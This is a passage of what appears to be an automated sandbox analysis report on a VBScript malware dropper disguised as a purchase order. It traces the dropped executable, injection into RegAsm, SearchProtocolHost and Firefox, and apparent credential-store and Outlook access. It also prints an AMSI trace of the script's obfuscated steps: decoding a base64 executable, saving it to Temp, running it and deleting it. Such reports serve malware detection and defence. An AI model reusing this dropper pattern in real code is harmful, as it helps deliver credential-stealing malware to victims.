                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033C5AA06_2_033C5AA0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0337EA806_2_0337EA80
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0341DAAC6_2_0341DAAC
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033969626_2_03396962
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033899506_2_03389950
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0339B9506_2_0339B950
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033829A06_2_033829A0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0344A9A66_2_0344A9A6
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0338A8406_2_0338A840
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033828406_2_03382840
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033668B86_2_033668B8
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033AE8F06_2_033AE8F0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033838E06_2_033838E0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033A0F306_2_033A0F30
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0343FF096_2_0343FF09
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033F4F406_2_033F4F40
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03381F926_2_03381F92
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0338CFE06_2_0338CFE0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0343FFB16_2_0343FFB1
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03372FC86_2_03372FC8
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03380E596_2_03380E59
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0343EE266_2_0343EE26
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03389EB06_2_03389EB0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0343EEDB6_2_0343EEDB
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03392E906_2_03392E90
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0343CE936_2_0343CE93
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03431D5A6_2_03431D5A
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03437D736_2_03437D73
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0338AD006_2_0338AD00
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03383D406_2_03383D40
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03398DBF6_2_03398DBF
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0337ADE06_2_0337ADE0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0339FDC06_2_0339FDC0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033F9C326_2_033F9C32
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03380C006_2_03380C00
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0343FCF26_2_0343FCF2
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03370CF26_2_03370CF2
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03420CB56_2_03420CB5
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02C122A06_2_02C122A0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02C0B38D6_2_02C0B38D
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02C0B3906_2_02C0B390
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02C0D3B06_2_02C0D3B0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02C0D1906_2_02C0D190
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02C0B4D46_2_02C0B4D4
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02C0B4E06_2_02C0B4E0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02C13AFA6_2_02C13AFA
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02C13B406_2_02C13B40
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02C13B3B6_2_02C13B3B
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02C159406_2_02C15940
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02C2BFC06_2_02C2BFC0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0323E3446_2_0323E344
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0323E7FC6_2_0323E7FC
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0323E4666_2_0323E466
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0323CB736_2_0323CB73
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0323CAEA6_2_0323CAEA
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0323D8C86_2_0323D8C8
                Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exeCode function: 9_2_0587CCC59_2_0587CCC5
                Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exeCode function: 9_2_0587CAFF9_2_0587CAFF
                Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 11_2_0000021FB4D76AEA11_2_0000021FB4D76AEA
                Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 11_2_0000021FB4D787FC11_2_0000021FB4D787FC
                Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 11_2_0000021FB4D7834411_2_0000021FB4D78344
                Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 11_2_0000021FB4D76B7311_2_0000021FB4D76B73
                Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 11_2_0000021FB4D778C811_2_0000021FB4D778C8
                Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 11_2_0000021FB4D7846611_2_0000021FB4D78466
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: String function: 033C7E54 appears 88 times
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: String function: 0336B970 appears 263 times
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: String function: 033FF290 appears 105 times
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: String function: 033B5130 appears 36 times
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: String function: 033EEA12 appears 84 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 02CAF290 appears 105 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 02C77E54 appears 88 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 02C65130 appears 36 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 02C9EA12 appears 84 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 02C1B970 appears 263 times
                Source: PO_1111101161.vbsInitial sample: Strings found which are bigger than 50
                Source: p_Cm7afCdw.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: p_Cm7afCdw.exe.0.dr, ce3944aa07b1cff9ab1bef1e9885a9a97.csCryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
                Source: p_Cm7afCdw.exe.0.dr, c69be8bb92ecb07bb655463f3d3cc8c62.csCryptographic APIs: 'CreateDecryptor'
                Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@9/4@5/5
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\p_Cm7afCdw.exe.logJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exeMutant created: NULL
                Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user~1\AppData\Local\Temp\exec_VPfRCcR9.logJump to behavior
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_1111101161.vbs"
                Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: PO_1111101161.vbsReversingLabs: Detection: 18%
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_1111101161.vbs"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exe "C:\Users\user~1\AppData\Local\Temp\p_Cm7afCdw.exe"
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exeProcess created: C:\Windows\SysWOW64\SearchProtocolHost.exe "C:\Windows\SysWOW64\SearchProtocolHost.exe"
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exe "C:\Users\user~1\AppData\Local\Temp\p_Cm7afCdw.exe" Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exeProcess created: C:\Windows\SysWOW64\SearchProtocolHost.exe "C:\Windows\SysWOW64\SearchProtocolHost.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msdart.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: tquery.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: cryptdll.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: Binary string: wntdll.pdb source: RegAsm.exe, SearchProtocolHost.exe

                Data Obfuscation

                barindex
                VBScript performs obfuscated calls to suspicious functions
                Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("C:\Users\user~1\AppData\Local\Temp\p_Cm7afCdw.exe", "1", "true");IFileSystem3.GetSpecialFolder("2");IFolder.Path();IHost.Sleep("Unsupported parameter type 00000004");IFileSystem3.OpenTextFile("C:\Users\user~1\AppData\Local\Temp\exec_VPfRCcR9.log", "8", "true");ITextStream.WriteLine("02/12/2024 09:53:20 - INFO: Setup done.");ITextStream.Close();IDictionary.Add("%%", "A");IDictionary.Add("))", "T");IDictionary.Add("@@", "V");IDictionary.Add("...", "B");IDictionary.Add("&&&", "J");IDictionary.Add("**", "M");IDictionary.Add("::", "R");IDictionary.Add("~~", "Q");IDictionary.Keys();IDictionary.Item("%%");IDictionary.Item("))");IDictionary.Item("@@");IDictionary.Item("...");IDictionary.Item("&&&");IDictionary.Item("**");IDictionary.Item("::");IDictionary.Item("~~");IXMLDOMNode._00000029("base64");IXMLDOMElement.dataType("bin.base64");IXMLDOMElement.text("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAJJrTWcAAAAAAAAAAOAALgALATAAAAIGAAAIBgAAAAAA0iA");IXMLDOMElement.nodeTypedValue();IFileSystem3.GetSpecialFolder("2");IFolder.Path();_Stream.Type("1");_Stream.Open();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user~1\AppData\Local\Temp\p_Cm7afCdw.exe", "2");_Stream.Close();IFileSystem3.FileExists("C:\Users\user~1\AppData\Local\Temp\p_Cm7afCdw.exe");IHost.Sleep("Unsupported parameter type 00000004");IWshShell3.Run("C:\Users\user~1\AppData\Local\Temp\p_Cm7afCdw.exe", "1", "true");IFileSystem3.FileExists("C:\Users\user~1\AppData\Local\Temp\p_Cm7afCdw.exe");IFileSystem3.DeleteFile("C:\Users\user~1\AppData\Local\Temp\p_Cm7afCdw.exe");IFileSystem3.GetSpecialFolder("2");IFolder.Path();IHost.Sleep("Unsupported parameter type 00000004");IFileSystem3.OpenTextFile("C:\Users\user~1\AppData\Local\Temp\exec_VPfRCcR9.log", "8", "true");ITextStream.WriteLine("02/12/2024 09:53:20 - INFO: Setup done.");ITextStream.Close();IDictionary.Add("%%", "A");IDictionary.Add("))", "T");IDictionary.Add("@@", "V");IDictionary.Add("...", "B");IDictionary.Add("&&&", "J");IDictionary.Add("**", "M");IDictionary.Add("::", "R");IDictionary.Add("~~", "Q");IDictionary.Keys();IDictionary.Item("%%");IDictionary.Item("))");IDictionary.Item("@@");IDictionary.Item("...");IDictionary.Item("&&&");IDictionary.Item("**");IDictionary.Item("::");IDictionary.Item("~~");IXMLDOMNode._00000029("base64");IXMLDOMElement.dataType("bin.base64");IXMLDOMElement.text("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAJJrTWcAAAAAAAAAAOAALgALATAAAAIGAAAIBgAAAAAA0iA");IXMLDOMElement.nodeTypedValue();IFileSystem3.GetSpecialFolder("2");IFolder.Path();_Stream.Type("1");_Stream.Open();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user~1\AppData\Local\Temp\p_Cm7afCdw.exe
                .NET source code contains potential unpacker
                Source: p_Cm7afCdw.exe.0.dr, ceb98a9c438487b1a75a637dc1f78bd03.cs.Net Code: cccb63f871ff4c04b83a7a96f5cd88f74 System.Reflection.Assembly.Load(byte[])
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040203D push ebp; ret 4_2_0040203E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004129B0 push edi; iretd 4_2_004129BF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004129B3 push edi; iretd 4_2_004129BF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00402205 push edx; iretd 4_2_00402208
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00412A0A push edi; iretd 4_2_004129BF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040DB1B pushfd ; ret 4_2_0040DB1C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00419320 push ebx; retf 4_2_0041936D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00403480 push eax; ret 4_2_00403482
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004024B1 push ds; ret 4_2_004024B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00404D48 push edx; ret 4_2_00404D4B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041ADE0 push edx; iretd 4_2_0041ADF5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040D757 push ecx; ret 4_2_0040D772
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040870B push dword ptr [edx]; ret 4_2_00408710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00414FE5 push edx; iretd 4_2_00414FFC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004017F6 push ds; iretd 4_2_004017FE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040D78C push ecx; ret 4_2_0040D772
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040D791 push ecx; ret 4_2_0040D772
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02BF225F pushad ; ret 4_2_02BF27F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02BF1368 push eax; iretd 4_2_02BF1369
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02BFB008 push es; iretd 4_2_02BFB009
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02BF1078 push edi; retn 0002h4_2_02BF108A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02BF27FA pushad ; ret 4_2_02BF27F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02BF283D push eax; iretd 4_2_02BF2858
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C209AD push ecx; mov dword ptr [esp], ecx4_2_02C209B6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02BF9939 push es; iretd 4_2_02BF9940
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033709AD push ecx; mov dword ptr [esp], ecx6_2_033709B6
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02C05288 push dword ptr [edx]; ret 6_2_02C0528D
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02C1A383 push ds; ret 6_2_02C1A384
